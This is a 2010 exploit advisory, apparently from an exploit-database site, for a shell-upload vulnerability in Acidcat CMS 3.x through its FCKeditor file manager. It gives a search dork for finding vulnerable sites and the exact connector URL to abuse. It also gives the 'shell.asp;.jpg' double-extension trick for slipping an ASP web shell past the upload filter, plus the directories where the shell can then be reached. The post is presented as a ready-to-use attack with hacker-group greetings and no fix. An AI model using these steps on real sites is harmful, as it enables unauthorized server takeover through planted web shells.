Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability

2010-11-23 09:15:13

==============================================================================

[»] Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability

==============================================================================

[»] Title : [ Acidcat CMS v 3.x (fckeditor) Shell Upload Vulnerability ]

[»] Script : [ Mini-NUKE v2.3 ]

[»] Language: [ ASP ]

[»] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]

[»] Author : [ Net.Edit0r - [email protected] }

[»] My Home : [ ajaxtm.com and datacoders.org ]

[»] Date : [ 2010-11-23 ]

[»] Version : [ 3.3.X and 3.2.x ]

[»] Dork : [ "Powered by Acidcat CMS " ]



###########################################################################


===[ Exploit ]===


[»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp

[»] asp renamed via the .asp;.jpg (shell.asp;.jpg)

===[ Upload To ]===

[»] http://server/read_write/file/[Shell]

[»] http://server/public/File/[Shell]


Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1

BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker


###########################################################################

Fixes

No fixes

In order to submit a new fix you need to be registered.